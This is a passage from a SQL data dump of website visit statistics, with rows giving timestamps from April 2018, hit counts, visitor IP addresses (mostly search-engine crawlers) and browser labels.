9638,1522898504,1,1,0,0,'54.36.148.47','other'),(229639,1522898780,1,1,0,0,'54.36.148.14','other'),(229640,1522898937,1,1,0,0,'54.36.149.100','other'),(229641,1522899070,1,1,0,0,'54.36.148.147','other'),(229642,1522899181,1,1,0,0,'54.36.148.158','other'),(229643,1522899247,1,1,0,0,'54.36.148.10','other'),(229644,1522899339,1,1,0,0,'54.36.148.23','other'),(229645,1522899482,1,1,0,0,'37.9.113.134','other'),(229646,1522899484,1,1,0,0,'54.36.148.192','other'),(229647,1522899736,1,1,0,0,'141.8.142.74','other'),(229648,1522899999,1,1,0,0,'54.36.148.109','other'),(229649,1522900121,1,1,0,0,'54.36.148.101','other'),(229650,1522900209,1,1,0,0,'178.154.171.4','other'),(229651,1522900497,1,1,0,0,'54.36.148.122','other'),(229652,1522900498,1,1,0,0,'54.36.148.52','other'),(229653,1522901041,1,1,0,0,'35.226.23.240','other'),(229654,1522901145,1,1,0,0,'54.36.148.37','other'),(229655,1522901270,1,1,0,0,'54.36.148.19','other'),(229656,1522901457,1,1,0,0,'188.230.43.254','other'),(229657,1522901537,1,1,0,0,'141.8.142.74','other'),(229658,1522901649,1,1,0,0,'54.36.148.186','other'),(229659,1522901681,1,1,0,0,'54.36.148.92','other'),(229660,1522901832,1,1,0,0,'54.36.149.13','other'),(229661,1522901848,1,1,0,0,'54.36.149.77','other'),(229662,1522902490,1,1,0,0,'54.36.148.27','other'),(229663,1522902585,1,1,0,0,'54.36.148.185','other'),(229664,1522902701,1,1,0,0,'35.226.23.240','other'),(229665,1522902943,1,1,0,0,'54.36.148.105','other'),(229666,1522902973,1,0,1,0,'66.249.70.27',''),(229667,1522903059,1,1,0,0,'216.244.66.246','other'),(229668,1522903191,1,1,0,0,'91.209.11.236','other'),(229669,1522903620,1,1,0,0,'54.36.148.48','other'),(229670,1522903682,1,1,0,0,'54.36.148.180','other'),(229671,1522903760,1,1,0,0,'54.36.148.73','other'),(229672,1522903987,1,1,0,0,'54.36.148.135','other'),(229673,1522904170,1,1,0,0,'188.230.43.254','other'),(229674,1522904208,1,1,0,0,'176.101.1.232','chrome'),(229675,1522904367,1,1,0,0,'37.9.113.182','other'),(229676,1522904380,1,1,0,0,'37.9.113.134','other'),(229677,1522904644,1,1,0,0,'54.36.148.40','other'),(229678,1522904684,1,1,0,0,'54.36.148.79','other'),(229679,1522904716,1,1,0,0,'54.36.148.49','other'),(229680,1522904899,1,1,0,0,'54.36.148.206','other'),(229681,1522905063,1,1,0,0,'5.45.207.58','other'),(229682,1522905117,1,1,0,0,'95.134.40.70','chrome'),(229683,1522905274,1,0,1,0,'66.249.64.30',''),(229684,1522905544,1,1,0,0,'216.244.66.194','other'),(229685,1522905599,1,1,0,0,'87.250.224.39','other'),(229686,1522905602,1,1,0,0,'37.9.113.110','other'),(229687,1522905672,1,1,0,0,'54.36.148.92','other'),(229688,1522905776,1,1,0,0,'188.230.43.254','other'),(229689,1522905789,1,1,0,0,'54.36.148.163','other'),(229690,1522905841,1,1,0,0,'91.196.178.70','firefox'),(229691,1522905969,1,1,0,0,'35.226.23.240','other'),(229692,1522906102,1,1,0,0,'54.36.148.160','other'),(229693,1522906167,1,1,0,0,'54.36.148.32','other'),(229694,1522906241,1,1,0,0,'54.36.149.79','other'),(229695,1522906306,1,1,0,0,'54.36.149.104','other'),(229696,1522906459,1,0,1,0,'66.249.70.29',''),(229697,1522906685,1,1,0,0,'54.36.148.254','other'),(229698,1522906901,1,1,0,0,'54.36.148.229','other'),(229699,1522907078,1,1,0,0,'37.9.113.182','other'),(229700,1522907079,1,1,0,0,'91.196.177.46','chrome'),(229701,1522907276,1,1,0,0,'46.201.59.215','chrome'),(229702,1522907288,1,1,0,0,'141.8.142.74','other'),(229703,1522907364,1,1,0,0,'54.36.148.181','other'),(229704,1522907550,1,1,0,0,'54.36.149.78','other'),(229705,1522907841,1,1,0,0,'54.36.148.50','other'),(229706,1522908059,1,1,0,0,'54.36.148.52','other'),(229707,1522908062,1,1,0,0,'8.29.198.25','other'),(229708,1522908156,1,1,0,0,'54.36.148.60','other'),(229709,1522908202,1,1,0,0,'54.36.149.36','other'),(229710,1522908433,1,1,0,0,'54.36.148.144','other'),(229711,1522908625,1,1,0,0,'54.36.148.108','other'),(229712,1522908642,1,1,0,0,'54.36.149.73','other'),(229713,1522908644,1,1,0,0,'54.36.149.66','other'),(229714,1522908680,1,1,0,0,'216.244.66.237','other'),(229715,1522909072,1,1,0,0,'141.8.142.74','other'),(229716,1522909306,1,1,0,0,'91.196.178.169','chrome'),(229717,1522909329,2,2,0,0,'91.196.178.103','chrome'),(229718,1522909492,1,1,0,0,'54.36.148.176','other'),(229719,1522909515,1,1,0,0,'54.36.149.20','other'),(229720,1522909757,2,2,0,0,'91.196.178.83','chrome'),(229721,1522910078,1,1,0,0,'54.36.148.194','other'),(229722,1522910247,2,2,0,0,'46.219.250.89','chrome'),(229723,1522910304,1,1,0,0,'87.250.224.85','other'),(229724,1522910477,1,1,0,0,'37.73.241.229','chrome'),(229725,1522910511,1,1,0,0,'54.36.148.93','other'),(229726,1522910555,1,1,0,0,'91.196.178.86','chrome'),(229727,1522910629,1,1,0,0,'54.36.148.199','other'),(229728,1522910644,1,1,0,0,'87.250.224.46','other'),(229729,1522910813,1,1,0,0,'54.36.148.138','other'),(229730,1522910822,1,1,0,0,'54.36.148.213','other'),(229731,1522910974,1,1,0,0,'54.36.148.92','other'),(229732,1522911267,1,1,0,0,'54.36.148.205','other'),(229733,1522911293,1,1,0,0,'54.36.148.152','other'),(229734,1522911299,1,1,0,0,'54.36.148.226','other'),(229735,1522911379,1,1,0,0,'54.36.148.219','other'),(229736,1522911434,1,1,0,0,'54.36.148.146','other'),(229737,1522911587,1,1,0,0,'54.36.148.174','other'),(229738,1522911667,1,1,0,0,'54.36.149.22','other'),(229739,1522911808,1,1,0,0,'216.244.66.237','other'),(229740,1522911959,1,1,0,0,'80.252.154.233','chrome'),(229741,1522912004,1,1,0,0,'217.20.167.17','chrome'),(229742,1522912504,1,1,0,0,'91.124.182.170','firefox'),(229743,1522912525,1,1,0,0,'54.36.149.54','other'),(229744,1522912712,2,2,0,0,'91.196.178.169','chrome'),(229745,1522912847,1,1,0,0,'216.244.66.194','other'),(229746,1522913027,1,1,0,0,'54.36.148.56','other'),(229747,1522913088,2,2,0,0,'54.36.148.139','other'),(229748,1522913360,1,1,0,0,'54.36.148.72','other'),(229749,1522913588,1,1,0,0,'54.36.149.72','other'),(229750,1522914027,1,1,0,0,'54.36.148.238','other'),(229751,1522914323,1,1,0,0,'87.250.224.46','other'),(229752,1522914382,1,1,0,0,'37.54.192.214','chrome'),(229753,1522914519,1,1,0,0,'109.252.90.64','chrome'),(229754,1522914726,1,1,0,0,'54.36.149.27','other'),(229755,1522914856,1,1,0,0,'54.36.148.157','other'),(229756,1522914899,1,1,0,0,'54.36.149.39','other'),(229757,1522914978,1,1,0,0,'54.36.148.149','other'),(229758,1522915002,1,1,0,0,'54.36.148.14','other'),(229759,1522915150,1,1,0,0,'54.36.149.9','other'),(229760,1522915580,1,1,0,0,'54.36.149.76','other'),(229761,1522916133,1,1,0,0,'54.36.148.42','other'),(229762,1522916432,1,1,0,0,'54.36.148.217','other'),(229763,1522916441,1,1,0,0,'216.244.66.237','other'),(229764,1522916481,1,1,0,0,'54.36.148.222','other'),(229765,1522917130,1,1,0,0,'54.36.148.200','other'),(229766,1522917159,1,1,0,0,'54.36.148.119','other'),(229767,1522917249,1,1,0,0,'94.178.98.176','chrome'),(229768,1522917519,1,1,0,0,'54.36.148.28','other'),(229769,1522917761,1,1,0,0,'54.36.148.250','other'),(229770,1522917845,1,1,0,0,'54.36.149.24','other'),(229771,1522917858,1,1,0,0,'93.188.39.163','firefox'),(229772,1522917873,1,1,0,0,'91.196.179.138','chrome'),(229773,1522917963,1,1,0,0,'91.196.178.136','chrome'),(229774,1522917993,1,1,0,0,'54.36.148.37','other'),(229775,1522918105,2,2,0,0,'91.196.178.83','chrome'),(229776,1522918208,1,1,0,0,'54.36.149.15','other'),(229777,1522918481,1,1,0,0,'91.196.178.136','firefox'),(229778,1522918617,1,1,0,0,'54.36.148.75','other'),(229779,1522918737,1,1,0,0,'54.36.148.201','other'),(229780,1522918824,1,1,0,0,'54.36.148.229','other'),(229781,1522919053,1,1,0,0,'216.244.66.246','other'),(229782,1522919176,1,1,0,0,'216.244.66.237','other'),(229783,1522919198,1,1,0,0,'54.36.148.154','other'),(229784,1522919377,1,1,0,0,'54.36.149.15','other'),(229785,1522919462,2,2,0,0,'35.226.23.240','other'),(229786,1522919473,1,1,0,0,'8.29.198.27','other'),(229787,1522919480,1,1,0,0,'54.36.148.141','other'),(229788,1522919538,2,2,0,0,'91.196.178.83','chrome'),(229789,1522919561,1,1,0,0,'54.36.148.129','other'),(229790,1522919740,1,1,0,0,'54.36.148.101','other'),(229791,1522919888,1,1,0,0,'54.36.148.242','other'),(229792,1522919907,1,1,0,0,'54.36.148.38','other'),(229793,1522920228,1,1,0,0,'54.36.149.33','other'),(229794,1522920245,1,1,0,0,'54.36.149.74','other'),(229795,1522920398,2,2,0,0,'95.134.202.194','chrome'),(229796,1522920418,1,1,0,0,'54.36.149.54','other'),(229797,1522920461,1,1,0,0,'94.180.193.51','msie'),(229798,1522920699,1,1,0,0,'54.36.148.28','other'),(229799,1522920826,2,2,0,0,'216.244.66.237','other'),(229800,1522921050,1,1,0,0,'54.36.149.66','other'),(229801,1522921071,1,1,0,0,'91.124.182.170','firefox'),(229802,1522921187,1,1,0,0,'178.154.171.55','other'),(229803,1522921308,1,1,0,0,'54.36.148.19','other'),(229804,1522921343,1,1,0,0,'54.36.148.157','other'),(229805,1522921388,1,1,0,0,'54.36.149.85','other'),(229806,1522921461,1,1,0,0,'141.8.142.74','other'),(229807,1522921686,1,1,0,0,'180.76.15.12','other'),(229808,1522922658,1,1,0,0,'54.36.148.239','other'),(229809,1522923075,1,1,0,0,'213.180.203.40','other'),(229810,1522923306,1,1,0,0,'54.36.148.34','other'),(229811,1522923464,1,1,0,0,'54.36.149.71','other'),(229812,1522923616,1,1,0,0,'54.36.148.96','other'),(229813,1522923846,1,1,0,0,'54.36.148.149','other'),(229814,1522924034,1,1,0,0,'54.36.149.32','other'),(229815,1522924188,1,1,0,0,'54.36.148.83','other'),(229816,1522924271,1,1,0,0,'54.36.148.33','other'),(229817,1522924273,1,1,0,0,'54.36.148.200','other'),(229818,1522924304,1,1,0,0,'54.36.148.105','other'),(229819,1522924405,1,1,0,0,'54.36.149.45','other'),(229820,1522924567,1,1,0,0,'54.36.149.75','other'),(229821,1522925003,1,1,0,0,'54.36.148.151','other'),(229822,1522925011,1,1,0,0,'141.8.142.74','other'),(229823,1522925022,1,1,0,0,'54.36.148.172','other'),(229824,1522925289,1,1,0,0,'216.244.66.237','other'),(229825,1522925318,1,1,0,0,'54.36.148.42','other'),(229826,1522925775,1,1,0,0,'54.36.148.142','other'),(229827,1522925961,1,1,0,0,'54.36.149.96','other'),(229828,1522925987,1,1,0,0,'46.201.59.215','chrome'),(229829,1522925992,1,1,0,0,'54.36.149.91','other'),(229830,1522926203,1,1,0,0,'54.36.148.101','other'),(229831,1522926219,1,1,0,0,'204.79.180.6','msie'),(229832,1522926856,1,1,0,0,'54.36.149.59','other'),(229833,1522927811,2,2,0,0,'216.244.66.237','other'),(229834,1522927919,1,0,1,0,'66.249.64.28',''),(229835,1522928078,1,1,0,0,'178.154.171.88','other'),(229836,1522928143,1,1,0,0,'54.36.148.76','other'),(229837,1522928180,1,1,0,0,'94.178.6.160','opera'),(229838,1522928206,1,1,0,0,'54.36.149.99','other'),(229839,1522928513,1,1,0,0,'54.36.148.87','other'),(229840,1522928700,1,1,0,0,'54.36.149.98','other'),(229841,1522928759,1,1,0,0,'54.36.149.78','other'),(229842,1522928793,1,1,0,0,'54.36.148.78','other'),(229843,1522929074,1,1,0,0,'54.36.148.30','other'),(229844,1522929125,1,1,0,0,'54.36.148.38','other'),(229845,1522929219,1,1,0,0,'62.80.180.26','firefox'),(229846,1522929226,1,1,0,0,'54.36.149.87','other'),(229847,1522929323,1,1,0,0,'54.36.148.186','other'),(229848,1522929454,1,1,0,0,'54.36.148.93','other'),(229849,1522929597,1,1,0,0,'54.36.148.189','other'),(229850,1522929820,1,1,0,0,'216.244.66.237','other'),(229851,1522929853,1,1,0,0,'37.73.152.236','chrome'),(229852,1522929892,1,1,0,0,'54.36.148.116','other'),(229853,1522930065,1,1,0,0,'54.36.148.78','other'),(229854,1522930436,1,1,0,0,'8.29.198.26','other'),(229855,1522930732,1,1,0,0,'54.36.149.15','other'),(229856,1522930839,1,1,0,0,'54.36.149.94','other'),(229857,1522930949,1,1,0,0,'54.36.148.33','other'),(229858,1522931338,1,1,0,0,'54.36.149.51','other'),(229859,1522931438,1,1,0,0,'141.8.142.74','other'),(229860,1522932034,1,1,0,0,'54.36.148.158','other'),(229861,1522932035,1,1,0,0,'54.36.148.113','other'),(229862,1522932039,1,1,0,0,'54.36.148.95','other'),(229863,1522932089,1,0,1,0,'66.249.64.30',''),(229864,1522932305,1,1,0,0,'141.8.132.22','other'),(229865,1522932798,1,1,0,0,'54.36.149.18','other'),(229866,1522932883,1,1,0,0,'54.36.148.203','other'),(229867,1522932930,1,1,0,0,'54.36.148.182','other'),(229868,1522932957,2,2,0,0,'178.154.171.88','other'),(229869,1522933158,1,1,0,0,'35.226.23.240','other'),(229870,1522933254,1,1,0,0,'54.36.148.128','other'),(229871,1522933268,1,1,0,0,'54.36.148.50','other'),(229872,1522933270,1,1,0,0,'54.36.148.172','other'),(229873,1522933361,2,2,0,0,'91.196.178.161','chrome'),(229874,1522933537,1,1,0,0,'54.36.148.146','other'),(229875,1522933740,1,1,0,0,'54.36.148.208','other'),(229876,1522934558,1,1,0,0,'178.154.171.88','other'),(229877,1522934615,1,1,0,0,'91.196.178.71','firefox'),(229878,1522934713,1,1,0,0,'54.36.149.64','other'),(229879,1522934731,1,1,0,0,'54.36.148.130','other'),(229880,1522934752,1,1,0,0,'54.36.149.75','other'),(229881,1522934773,1,1,0,0,'54.36.148.16','other'),(229882,1522935037,1,1,0,0,'54.36.149.36','other'),(229883,1522935440,1,1,0,0,'31.43.31.185','chrome'),(229884,1522935703,1,1,0,0,'216.244.66.194','other'),(229885,1522935811,1,1,0,0,'54.36.149.39','other'),(229886,1522935872,2,2,0,0,'141.8.142.74','other'),(229887,1522936109,1,1,0,0,'216.244.66.237','other'),(229888,1522936251,1,1,0,0,'54.36.148.49','other'),(229889,1522936263,1,1,0,0,'54.36.148.48','other'),(229890,1522936329,1,1,0,0,'54.36.148.144','other'),(229891,1522936389,1,1,0,0,'54.36.148.196','other'),(229892,1522936433,1,1,0,0,'54.36.148.75','other'),(229893,1522936918,1,1,0,0,'92.112.125.243','chrome'),(229894,1522936985,1,1,0,0,'54.36.149.61','other'),(229895,1522937250,1,1,0,0,'46.211.26.2','other'),(229896,1522937424,1,1,0,0,'66.249.64.28','chrome'),(229897,1522937540,1,1,0,0,'216.244.66.237','other'),(229898,1522937612,1,1,0,0,'188.230.43.254','other'),(229899,1522937628,1,1,0,0,'54.36.149.95','other'),(229900,1522937654,1,1,0,0,'5.228.157.178','msie'),(229901,1522938069,1,1,0,0,'54.36.148.34','other'),(229902,1522938091,1,1,0,0,'178.154.171.88','other'),(229903,1522938142,1,1,0,0,'54.36.149.43','other'),(229904,1522938222,1,1,0,0,'54.36.148.85','other'),(229905,1522938257,1,1,0,0,'141.8.142.74','other'),(229906,1522938777,1,1,0,0,'54.36.148.186','other'),(229907,1522938909,1,1,0,0,'54.36.148.190','other'),(229908,1522939240,1,1,0,0,'188.230.43.254','other'),(229909,1522939290,1,1,0,0,'54.36.148.69','other'),(229910,1522940206,1,1,0,0,'54.36.148.75','other'),(229911,1522940368,1,1,0,0,'216.244.66.237','other'),(229912,1522940481,1,1,0,0,'54.36.149.82','other'),(229913,1522940508,1,1,0,0,'54.36.148.38','other'),(229914,1522940544,1,1,0,0,'54.36.148.253','other'),(229915,1522940602,1,1,0,0,'54.36.148.135','other'),(229916,1522940881,1,1,0,0,'54.36.149.18','other'),(229917,1522941089,1,1,0,0,'54.36.148.22','other'),(229918,1522941193,1,1,0,0,'54.36.149.10','other'),(229919,1522941203,1,1,0,0,'188.230.43.254','other'),(229920,1522941287,1,1,0,0,'8.29.198.27','other'),(229921,1522941391,1,1,0,0,'54.209.67.250','other'),(229922,1522941587,1,1,0,0,'54.36.148.71','other'),(229923,1522941896,1,1,0,0,'54.36.148.218','other'),(229924,1522942495,1,1,0,0,'54.36.149.58','other'),(229925,1522942930,1,1,0,0,'141.8.142.74','other'),(229926,1522943134,1,1,0,0,'54.36.148.77','other'),(229927,1522943173,1,1,0,0,'54.36.148.186','other'),(229928,1522943339,1,1,0,0,'54.36.148.199','other'),(229929,1522943384,1,1,0,0,'54.36.148.93','other'),(229930,1522943420,1,1,0,0,'87.250.224.46','other'),(229931,1522943511,1,1,0,0,'54.36.148.190','other'),(229932,1522943529,2,2,0,0,'216.244.66.237','other'),(229933,1522943773,1,1,0,0,'37.73.251.208','chrome'),(229934,1522944258,1,1,0,0,'54.36.148.122','other'),(229935,1522944320,1,1,0,0,'178.154.171.88','other'),(229936,1522944330,1,1,0,0,'54.36.148.165','other'),(229937,1522944847,1,1,0,0,'54.36.148.66','other'),(229938,1522945102,1,1,0,0,'54.36.148.170','other'),(229939,1522945227,1,1,0,0,'54.36.148.79','other'),(229940,1522945494,1,1,0,0,'54.36.148.153','other'),(229941,1522945504,1,1,0,0,'54.36.148.119','other'),(229942,1522945551,1,1,0,0,'54.36.148.143','other'),(229943,1522945676,3,3,0,0,'141.8.142.74','other'),(229944,1522945858,1,1,0,0,'31.202.193.180','chrome'),(229945,1522946043,1,1,0,0,'54.36.149.69','other'),(229946,1522946071,1,1,0,0,'54.36.148.155','other'),(229947,1522946577,1,1,0,0,'54.36.148.26','other'),(229948,1522946943,3,3,0,0,'141.8.142.74','other'),(229949,1522947182,1,1,0,0,'216.244.66.194','other'),(229950,1522947183,1,1,0,0,'54.36.148.250','other'),(229951,1522947280,1,1,0,0,'54.36.148.254','other'),(229952,1522947467,1,1,0,0,'157.55.39.185','other'),(229953,1522947620,1,1,0,0,'54.36.148.144','other'),(229954,1522947719,1,1,0,0,'54.36.148.169','other'),(229955,1522947729,1,1,0,0,'54.36.149.14','other'),(229956,1522948249,1,1,0,0,'54.36.148.27','other'),(229957,1522948259,1,1,0,0,'54.36.148.234','other'),(229958,1522948469,1,1,0,0,'157.55.39.185','other'),(229959,1522948885,3,3,0,0,'141.8.142.74','other'),(229960,1522948912,1,1,0,0,'54.36.149.57','other'),(229961,1522950102,2,2,0,0,'94.23.31.164','chrome'),(229962,1522950334,1,1,0,0,'54.36.148.167','other'),(229963,1522950522,1,1,0,0,'178.95.109.18','chrome'),(229964,1522950737,1,1,0,0,'54.36.149.92','other'),(229965,1522950912,1,1,0,0,'141.8.142.74','other'),(229966,1522951647,1,1,0,0,'54.36.148.194','other'),(229967,1522951665,1,1,0,0,'54.36.148.158','other'),(229968,1522952158,1,1,0,0,'54.36.148.120','other'),(229969,1522952159,1,1,0,0,'8.29.198.26','other'),(229970,1522952311,1,1,0,0,'54.36.148.170','other'),(229971,1522952696,1,1,0,0,'141.8.142.74','other'),(229972,1522953168,1,1,0,0,'178.154.171.88','other'),(229973,1522953185,1,1,0,0,'54.36.149.36','other'),(229974,1522953255,1,0,1,0,'66.249.69.35',''),(229975,1522953358,1,1,0,0,'54.36.148.215','other'),(229976,1522953390,1,1,0,0,'54.36.148.55','other'),(229977,1522953419,1,1,0,0,'54.36.148.133','other'),(229978,1522953541,1,1,0,0,'54.36.148.118','other'),(229979,1522953812,1,1,0,0,'54.36.148.14','other'),(229980,1522953927,1,1,0,0,'54.36.148.181','other'),(229981,1522954089,1,1,0,0,'54.36.148.115','other'),(229982,1522954103,1,1,0,0,'54.36.148.229','other'),(229983,1522954341,1,1,0,0,'207.46.13.80','other'),(229984,1522954391,1,1,0,0,'54.36.149.16','other'),(229985,1522954500,1,1,0,0,'157.55.39.185','other'),(229986,1522954585,1,1,0,0,'54.36.148.163','other'),(229987,1522954592,1,1,0,0,'54.36.149.102','other'),(229988,1522954598,1,1,0,0,'54.36.148.49','other'),(229989,1522954909,1,1,0,0,'54.36.148.132','other'),(229990,1522954987,1,1,0,0,'54.36.148.135','other'),(229991,1522954995,1,1,0,0,'54.36.148.211','other'),(229992,1522955162,1,1,0,0,'54.36.148.188','other'),(229993,1522955246,1,1,0,0,'54.36.148.89','other'),(229994,1522955532,1,1,0,0,'54.36.149.67','other'),(229995,1522955764,2,2,0,0,'37.54.114.62','chrome'),(229996,1522955933,1,1,0,0,'37.53.242.112','chrome'),(229997,1522956333,1,1,0,0,'66.249.69.93','chrome'),(229998,1522956508,1,1,0,0,'54.36.148.15','other'),(229999,1522956628,1,1,0,0,'54.36.149.14','other'),(230000,1522957203,2,2,0,0,'91.196.178.14','chrome'),(230001,1522957291,1,1,0,0,'54.36.149.46','other'),(230002,1522957408,1,1,0,0,'93.179.68.150','chrome'),(230003,1522957486,3,3,0,0,'141.8.142.74','other'),(230004,1522957604,1,1,0,0,'54.36.148.81','other'),(230005,1522957752,1,1,0,0,'54.36.148.139','other'),(230006,1522957871,1,1,0,0,'54.36.148.205','other'),(230007,1522958190,1,1,0,0,'54.36.149.79','other'),(230008,1522958397,1,1,0,0,'54.36.148.48','other'),(230010,1522958493,1,0,1,0,'66.249.69.39',''),(230011,1522959001,1,1,0,0,'54.36.148.113','other'),(230012,1522959157,1,1,0,0,'54.36.148.151','other'),(230013,1522959251,1,1,0,0,'54.36.148.118','other'),(230014,1522959335,1,1,0,0,'46.211.111.71','other'),(230015,1522959367,1,1,0,0,'35.226.23.240','other'),(230016,1522959851,1,1,0,0,'54.36.148.25','other'),(230017,1522960013,1,0,1,0,'66.249.69.41',''),(230018,1522960322,1,1,0,0,'46.101.230.81','other'),(230019,1522960376,1,1,0,0,'54.36.149.89','other'),(230020,1522960601,1,1,0,0,'54.36.148.108','other'),(230021,1522961135,1,1,0,0,'54.36.148.187','other'),(230022,1522961177,2,2,0,0,'54.36.149.36','other'),(230023,1522961249,1,1,0,0,'54.36.149.101','other'),(230024,1522961378,1,1,0,0,'54.36.148.239','other'),(230025,1522961394,1,1,0,0,'54.36.148.141','other'),(230026,1522961641,1,1,0,0,'54.36.148.172','other'),(230027,1522961784,1,1,0,0,'54.36.149.92','other'),(230028,1522962057,1,1,0,0,'54.36.149.99','other'),(230029,1522962084,1,1,0,0,'54.175.145.65','other'),(230030,1522962141,1,1,0,0,'54.36.149.103','other'),(230031,1522962277,35,35,0,0,'142.44.159.96','other'),(230032,1522962340,1,1,0,0,'54.36.149.61','other'),(230033,1522962399,1,1,0,0,'141.8.142.74','other'),(230034,1522962403,1,1,0,0,'178.154.171.88','other'),(230035,1522962520,1,1,0,0,'180.76.15.26','other'),(230036,1522962591,1,1,0,0,'54.36.148.86','other'),(230037,1522962843,1,1,0,0,'54.36.148.13','other'),(230038,1522962845,1,1,0,0,'54.36.149.95','other'),(230039,1522962853,1,1,0,0,'54.36.148.236','other'),(230040,1522963020,1,1,0,0,'8.29.198.25','other'),(230041,1522963040,1,1,0,0,'54.175.145.65','other'),(230042,1522963142,1,1,0,0,'54.36.149.92','other'),(230043,1522963537,1,1,0,0,'54.36.148.209','other'),(230044,1522963579,1,1,0,0,'54.36.148.199','other'),(230045,1522963765,1,1,0,0,'54.36.148.43','other'),(230046,1522963788,1,1,0,0,'54.36.148.111','other'),(230047,1522963862,1,1,0,0,'54.36.148.61','other'),(230048,1522963871,1,1,0,0,'54.36.148.137','other'),(230049,1522963956,1,1,0,0,'54.175.145.65','other'),(230050,1522964110,1,1,0,0,'54.36.149.44','other'),(230051,1522964401,1,1,0,0,'54.36.149.65','other'),(230052,1522964460,1,1,0,0,'54.36.148.182','other'),(230053,1522964618,1,1,0,0,'54.36.148.29','other'),(230054,1522964783,1,1,0,0,'54.36.148.157','other'),(230055,1522964968,1,1,0,0,'54.175.145.65','other'),(230056,1522965020,1,1,0,0,'54.36.149.78','other'),(230057,1522965040,1,1,0,0,'204.79.180.1','msie'),(230058,1522965323,1,1,0,0,'54.36.149.50','other'),(230059,1522965444,1,1,0,0,'54.36.149.83','other'),(230060,1522965540,1,1,0,0,'54.36.148.228','other'),(230061,1522965762,1,1,0,0,'54.36.148.168','other'),(230062,1522965799,1,0,1,0,'66.249.69.39',''),(230063,1522965920,1,1,0,0,'54.175.145.65','other'),(230064,1522966109,1,1,0,0,'54.36.148.246','other'),(230065,1522966169,1,1,0,0,'54.36.148.194','other'),(230066,1522966237,1,0,1,0,'66.249.69.35',''),(230067,1522966552,1,1,0,0,'54.36.148.158','other'),(230068,1522966687,1,1,0,0,'54.36.148.77','other'),(230069,1522966761,2,2,0,0,'141.8.142.74','other'),(230070,1522966793,1,1,0,0,'54.36.148.178','other'),(230071,1522966918,1,1,0,0,'54.175.145.65','other'),(230072,1522967227,1,1,0,0,'54.36.148.17','other'),(230073,1522967245,2,2,0,0,'54.36.149.15','other'),(230074,1522967269,1,1,0,0,'54.36.149.1','other'),(230075,1522967332,1,0,1,0,'66.249.69.41',''),(230076,1522967466,1,1,0,0,'54.36.148.121','other'),(230077,1522967606,1,0,1,0,'66.249.69.35',''),(230078,1522967840,1,1,0,0,'54.175.145.65','other'),(230079,1522968190,1,1,0,0,'54.36.149.23','other'),(230080,1522968254,1,1,0,0,'54.36.149.65','other'),(230081,1522968409,1,1,0,0,'54.36.148.71','other'),(230082,1522968422,1,1,0,0,'66.249.69.35','chrome'),(230083,1522968536,1,1,0,0,'54.36.148.168','other'),(230084,1522968542,1,1,0,0,'54.36.148.231','other'),(230085,1522968595,1,1,0,0,'54.36.148.122','other'),(230086,1522968757,1,1,0,0,'54.175.145.65','other'),(230087,1522968865,1,1,0,0,'54.36.149.63','other'),(230088,1522969126,1,1,0,0,'54.36.148.229','other'),(230089,1522969167,2,2,0,0,'54.36.148.11','other'),(230090,1522969338,1,1,0,0,'54.36.148.236','other'),(230091,1522969457,1,0,1,0,'66.249.69.39',''),(230092,1522969680,1,1,0,0,'54.175.145.65','other'),(230093,1522969830,1,1,0,0,'35.226.23.240','other'),(230094,1522969836,1,1,0,0,'54.36.148.206','other'),(230095,1522969849,1,1,0,0,'54.36.149.93','other'),(230096,1522969852,1,1,0,0,'54.36.148.227','other'),(230097,1522970017,1,1,0,0,'54.36.149.10','other'),(230098,1522970077,1,1,0,0,'54.36.148.30','other'),(230099,1522970143,1,1,0,0,'54.36.148.32','other'),(230100,1522970359,1,1,0,0,'54.36.148.126','other'),(230101,1522970421,1,1,0,0,'54.36.148.120','other'),(230102,1522970582,1,1,0,0,'54.175.145.65','other'),(230103,1522971050,1,1,0,0,'54.36.148.137','other'),(230104,1522971159,1,1,0,0,'54.36.149.87','other'),(230105,1522971384,1,1,0,0,'54.36.148.90','other'),(230106,1522971500,1,1,0,0,'54.175.145.65','other'),(230107,1522971578,1,1,0,0,'54.36.148.255','other'),(230108,1522971668,2,2,0,0,'216.244.66.237','other'),(230109,1522971780,1,1,0,0,'54.36.148.143','other'),(230110,1522971908,1,1,0,0,'54.36.148.94','other'),(230111,1522971964,1,1,0,0,'54.36.149.73','other'),(230112,1522972033,1,1,0,0,'54.165.176.205','other'),(230113,1522972097,1,1,0,0,'54.36.149.29','other'),(230114,1522972352,1,1,0,0,'54.36.148.100','other'),(230115,1522972419,1,1,0,0,'54.175.145.65','other'),(230116,1522972500,1,1,0,0,'54.36.148.165','other'),(230117,1522972779,1,1,0,0,'54.36.148.219','other'),(230118,1522973117,1,1,0,0,'54.36.148.235','other'),(230119,1522973327,1,1,0,0,'54.175.145.65','other'),(230120,1522973381,1,1,0,0,'54.36.149.4','other'),(230121,1522973469,1,1,0,0,'54.36.148.237','other'),(230122,1522973480,1,1,0,0,'54.36.148.154','other'),(230123,1522973492,1,1,0,0,'54.36.149.67','other'),(230124,1522973845,1,1,0,0,'87.250.224.85','other'),(230125,1522973872,1,1,0,0,'8.29.198.27','other'),(230126,1522973895,1,1,0,0,'54.165.176.205','other'),(230127,1522973933,1,1,0,0,'54.36.149.26','other'),(230128,1522974057,1,0,1,0,'66.249.69.41',''),(230129,1522974246,2,2,0,0,'54.175.145.65','other'),(230130,1522974282,1,1,0,0,'54.36.149.40','other'),(230131,1522974292,1,1,0,0,'54.36.148.177','other'),(230132,1522974321,1,1,0,0,'54.36.148.130','other'),(230133,1522974394,1,1,0,0,'54.36.148.71','other'),(230134,1522974504,1,1,0,0,'35.226.23.240','other'),(230135,1522974731,1,1,0,0,'54.36.148.19','other'),(230136,1522974746,1,0,1,0,'66.249.69.35',''),(230137,1522974858,1,1,0,0,'54.165.176.205','other'),(230138,1522975002,1,1,0,0,'54.36.148.30','other'),(230139,1522975009,1,1,0,0,'178.154.171.88','other'),(230140,1522975041,1,1,0,0,'207.46.13.80','other'),(230141,1522975066,1,1,0,0,'54.36.148.11','other'),(230142,1522975079,1,1,0,0,'54.36.149.77','other'),(230143,1522975156,1,1,0,0,'54.175.145.65','other'),(230144,1522975493,1,1,0,0,'51.255.66.115','other'),(230145,1522975721,1,1,0,0,'54.36.148.234','other'),(230146,1522975827,1,1,0,0,'54.36.149.29','other'),(230147,1522975863,1,1,0,0,'54.165.176.205','other'),(230148,1522975876,1,1,0,0,'54.36.149.85','other'),(230149,1522976041,1,1,0,0,'87.250.224.85','other'),(230150,1522976081,1,1,0,0,'54.175.145.65','other'),(230151,1522976483,1,1,0,0,'54.36.148.187','other'),(230152,1522976484,1,1,0,0,'54.36.149.87','other'),(230153,1522976633,1,1,0,0,